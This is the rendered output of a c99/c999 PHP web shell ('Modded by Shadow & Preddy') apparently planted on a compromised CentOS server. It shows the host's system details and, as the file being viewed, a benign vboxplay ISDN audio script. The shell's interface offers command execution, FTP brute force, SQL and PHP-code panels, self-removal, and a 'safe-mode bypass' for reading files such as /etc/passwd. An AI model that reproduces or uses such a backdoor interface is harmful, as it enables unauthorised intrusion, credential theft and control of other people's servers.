!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/bin/   drwxr-xr-x
Free 52.24 GB of 127.8 GB (40.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     vboxplay (2.33 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#! /bin/sh
##
## vboxplay v2.0.0BETA5 (17-NOV-98)

#----------------------------------------------------------------------------#
# Usage: vboxplay SAMPLENAME [ VOLUME ]                                      #
#        If you want to change this, copy it to /etc/isdn/vboxplay and edit  #
#        the copy there.                                                     #
#----------------------------------------------------------------------------#

if [ "$0" != /etc/isdn/vboxplay -a -x /etc/isdn/vboxplay ]; then
	exec /etc/isdn/vboxplay "$@"
	echo "Can't execute /etc/isdn/vboxplay"
fi

SAMPLE=$1
VOLUME=$2
if [ "$VOLUME" == "" ]; then
   VOLUME=5;
fi


   # Replace this with your own play command. You also can use the pvftools
   # (or some other) to convert and play the messages.

# check whether NAS is running, and adjust DOPLAY to correspond
# check two locations, apparently it moves around...
PLAY=/auplay-not-found-so-dont-use-it
[ -x /usr/bin/auplay     ] && PLAY=/usr/bin/auplay
[ -x /usr/bin/X11/auplay ] && PLAY=/usr/bin/X11/auplay
if [ -x $PLAY ]; then
	AU=/au-not-found-so-dont-use-it
	[ -x /usr/bin/au     ] && AU=/usr/bin/au
	[ -x /usr/bin/X11/au ] && AU=/usr/bin/X11/au
	if ps aw | grep -v grep | grep $AU > /dev/null; then
        	DOPLAY="$PLAY -audio localhost:0 -volume $VOLUME"
	else
		PLAY=/auplay-not-usable-so-dont-use-it
	fi
fi
if [ ! -x $PLAY ]; then	# try aplay (from alsautils) instead
	if [ -x /usr/bin/aplay ]; then
		PLAY=/usr/bin/aplay
		# if anyone has a better suggestion,
		# send email to isdnutils@packages.debian.org!
                # thankfully, aplay understands '-' to mean stdin
		DOPLAY="$PLAY -q -u -"
	fi
fi
if [ ! -x $PLAY ]; then	# use play (from sox) instead
	# we need to convert to decimal for 'play'. Try 'dc'.
	if [ -x /usr/bin/dc ]; then
		soxvolume=`echo "2k $VOLUME 100/ps." | /usr/bin/dc`
	else
		# fall back to (slower) perl, which is always there
		soxvolume=`/usr/bin/perl -e "printf '%.02f', $VOLUME/100"`
	fi
        DOPLAY="/usr/bin/play -t au - -v $soxvolume"
fi

/usr/bin/vboxmode $SAMPLE

case $? in

   2|3|4|6) /usr/bin/vboxtoau <$SAMPLE | $DOPLAY
            ;;
         *) echo "$0: unknown vbox message format!"
            ;;
esac

# Example with pvftools:
#
# vboxtoau <$SAMPLE | \
#           autopvf | \
#           pvfamp $VOLUME | \
#           pvfcut 0.20 | \
#           pvftoau 8000 | \
#           auplay

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--